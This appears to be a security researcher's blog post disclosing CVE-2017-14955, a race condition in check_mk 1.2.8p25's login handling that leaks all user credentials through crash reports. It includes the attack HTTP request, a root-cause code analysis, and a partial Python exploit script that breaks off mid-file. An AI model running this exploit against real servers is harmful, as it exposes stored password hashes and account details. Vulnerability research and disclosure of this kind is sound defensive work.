The authors of check_mk have fixed a quite interesting vulnerability, which I have recently reported to them, called CVE-2017-14955 (sorry no fancy name here) affecting the oldstable version 1.2.8p25 and below of both check_mk and check_mk Enterprise. It’s basically about a Race Condition vulnerability affecting the login functionality, which in the end leads to the disclosure of authentication credentials to an unauthenticated user. Sounds like a bit of fun, doesn’t it? Let’s dig into it 😉

How to win a race

You might have seen this login interface before:

While trying to brute force the authentication of check_mk with multiple concurrent threads using the following request:

POST /check_mk/login.py HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
Content-Length: 772
Connection: close
Upgrade-Insecure-Requests: 1

---9519178121294961341040589727
Content-Disposition: form-data; name="filled_in"

login
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"

1
---9519178121294961341040589727
Content-Disposition: form-data; name="_origtarget"

index.py
---9519178121294961341040589727
Content-Disposition: form-data; name="_username"

omdadmin
---9519178121294961341040589727
Content-Disposition: form-data; name="_password"

welcome
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"

Login
---9519178121294961341040589727--

A really interesting “No such file or directory” is thrown randomly and completely unreliably, which looks like the following:

 <td class="left">Exception</td><td><pre>OSError ([Errno 2] No such file or directory)</pre></td></tr><tr class="data even0"><td class="left">Traceback</td><td><pre>  File &quot;/check_mk/web/htdocs/index.py&quot;, line 95, in handler
    login.page_login(plain_error())

  File &quot;/check_mk/web/htdocs/login.py&quot;, line 261, in page_login
    result = do_login()

  File &quot;/check_mk/web/htdocs/login.py&quot;, line 254, in do_login
    userdb.on_failed_login(username)

  File &quot;/check_mk/web/htdocs/userdb.py&quot;, line 273, in on_failed_login
    save_users(users)

  File &quot;/check_mk/web/htdocs/userdb.py&quot;, line 582, in save_users
    os.rename(filename, filename[:-4])
</pre></td></tr><tr class="data odd0"><td class="left">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',
                              'contactgroups': ['all'],
                              'disable_notifications': False,
                              'email': u'[email protected]',
                              'enforce_pw_change': False,
                              'last_pw_change': 0,
                              'last_seen': 0.0,
                              'locked': False,
                              'num_failed': 0,
                              'pager': '',
                              'password': '$1$400000$13371337asdfasdf',
                              'roles': ['admin'],
                              'serial': 2},
[...]

I guess you find this as interesting as I did, because this Python exception basically contains a copy of all added users including their email addresses, roles, and even their encrypted password.

Triaging

Sometimes I’m really curious about the root cause of some vulnerabilities just like in this specific case. What makes this vulnerability so interesting is the fact that the vulnerability can be triggered by just knowing one valid username, which is usually “omdadmin“.

So as soon as a login fails, the function “on_failed_login()” from /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py is triggered (lines 261-273):

def on_failed_login(username):
    users = load_users(lock = True)
    if username in users:
        if "num_failed" in users[username]:
            users[username]["num_failed"] += 1
        else:
            users[username]["num_failed"] = 1

        if config.lock_on_logon_failures:
            if users[username]["num_failed"] >= config.lock_on_logon_failures:
                users[username]["locked"] = True

        save_users(users)

This function basically stores the number of failed login attempts for a valid user and in the end calls another function named “save_users()” with the number of failed login attempts as an argument. When tracing further through the save_users(), you’ll finally come across the vulnerable code part (lines 575-582):

    
# Users with passwords for Multisite
    filename = multisite_dir + "users.mk.new"
    make_nagios_directory(multisite_dir)
    out = create_user_file(filename, "w")
    out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
    out.write("multisite_users = \\n%s\n" % pprint.pformat(users))
    out.close()
    os.rename(filename, filename[:-4])

But the vulnerability doesn’t look quite obvious, right? Well it’s basically about a race condition – if you’re not familiar with Race Conditions, just imagine the following situation applied to that code snippet:

  1. When brute-forcing, you usually use multiple, concurrent threads, because otherwise it would take too long.
  2. All of these threads will go through the same instruction set, which means they will call the save_users() function at nearly the same time – depending a bit on the connection delay between the client and the server.
  3. For simplicity let’s imagine, two of these threads are only a tenth of a millisecond away from each other, so “delayed” by just one instruction (in terms of the script shown above).
  4. The first thread passes all instructions and thereby creates a new “users.mk.new” file (line 2), until it reaches the os.rename call (line 8), but has not yet processed the os.rename call.
  5. The second thread, does the very same, but with the mentioned small delay: it passes all instructions including up to line 7, which means it has just closed the “users.mk.new” file and is now about to call the os.rename function as well.
  6. Since the first thread is a bit ahead of time, it is the first to processes the os.rename function call and thereby renames the “users.mk.new” file to “users.mk”.
  7. The second thread now tries to do the very same thing, however the “users.mk.new” file was just renamed by the first thread, which however means that “its own” os.rename call still tries to rename the “users.mk.new” file, which was apparently just renamed by the first thread.
  8. Since there is no exception handling built around this instruction set, the Python script fails since the second thread cannot find the file to rename and finally throws the stack trace from above leaking all the credential details.

A few more things that come into play here:

First: the create_user_file() function doesn’t really play an important role here, since it’s sole purpose is to create a new File object. So if the file passed to it via its “path” argument does already exist in the file-system, it will not throw an exception at all.

def create_user_file(path, mode):
    path = make_utf8(path)
    f = file(path, mode, 0)
    gid = grp.getgrnam(defaults.www_group).gr_gid
    # Tackle user problem: If the file is owned by nagios, the web
    # user can write it but cannot chown the group. In that case we
    # assume that the group is correct and ignore the error
    try:
        os.chown(path, -1, gid)
        os.chmod(path, 0660)
    except:
        pass
    return f

Second: More interestingly, the application is shipped with an own crash reporting system (see packages/check_mk/check_mk-1.2.8p25/web/htdocs/crash_reporting.py), which prints out all local variables including these very sensitive ones:

 def show_crash_report(info):
    html.write("<h2>%s</h2>" % _("Crash Report"))
    html.write("<table class=\"data\">")
    html.write("<tr class=\"data even0\"><td class=\"left legend\">%s</td>" % _("Crash Type"))
    html.write("<td>%s</td></tr>" % html.attrencode(info["crash_type"]))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Time"))
    html.write("<td>%s</td></tr>" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(info["time"])))
    html.write("<tr class=\"data even0\"><td class=\"left\">%s</td>" % _("Operating System"))
    html.write("<td>%s</td></tr>" % html.attrencode(info["os"]))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Check_MK Version"))
    html.write("<td>%s</td></tr>" % html.attrencode(info["version"]))
    html.write("<tr class=\"data even0\"><td class=\"left\">%s</td>" % _("Python Version"))
    html.write("<td>%s</td></tr>" % html.attrencode(info.get("python_version", _("Unknown"))))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Exception"))
    html.write("<td><pre>%s (%s)</pre></td></tr>" % (html.attrencode(info["exc_type"]),
                                                     html.attrencode(info["exc_value"])))
    html.write("<tr class=\"data even0\"><td class=\"left\">%s</td>" % _("Traceback"))
    html.write("<td><pre>%s</pre></td></tr>" % html.attrencode(format_traceback(info["exc_traceback"])))
    html.write("<tr class=\"data odd0\"><td class=\"left\">%s</td>" % _("Local Variables"))
    html.write("<td><pre>%s</pre></td></tr>" % html.attrencode(format_local_vars(info["local_vars"])))
    html.write("</table>")

Third: There is also another vulnerable instruction set right before the first one at /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py – lines 567 to 573, with exactly the same issue:

    # Check_MK's monitoring contacts
    filename = root_dir + "contacts.mk.new"
    out = create_user_file(filename, "w")
    out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
    out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
    out.close()
    os.rename(filename, filename[:-4])

About the Vendor Response

Just one word: amazing! I have reported this vulnerability on 2017-09-21, which was a Thursday, and they’ve already pushed a fix to their git on Tuesday 2017-09-25 and at the same time published a new version 1.2.8p26 which contains the official fix. Really commendable work check_mk team!

Exploit time!

An exploit script will be disclosed soon over at Exploit-DB, in the meanwhile, take it from here:

 #!/usr/bin/python
# Exploit Title: Check_mk <= v1.2.8p25 save_users() Race Condition
# Version:       <= 1.2.8p25
# Date:          2017-10-18
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      https://www.rcesecurity.com
# Software Link: https://mathias-kettner.de/check_mk.html
# Tested on:     1.2.8p25
# CVE:		 CVE-2017-14955
#
# Howto / Notes:
# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and
# below as described by CVE-2017-14955\. You only need a valid username to
# dump all encrypted passwords and make sure to setup a local proxy to
# catch the dump. Happy brute forcing ;-)

import requests
import threading

try:
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except:
	pass

# Config Me
target_url = "https://localhost/check_mk/login.py"
target_username = "omdadmin"

proxies = {
  'http': 'http://127.0.0.1:8080',
  'https': 'http://127.0.0.1:8080',
}

def make_session():
	v = requests.post(target_url, verify=False, proxies=proxies, files={'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (None, 'index.py'), '_username': (None, target_username), '_password': (None, 'random'), '_login': (None, 'Login')})
	return v.content

NUM = 50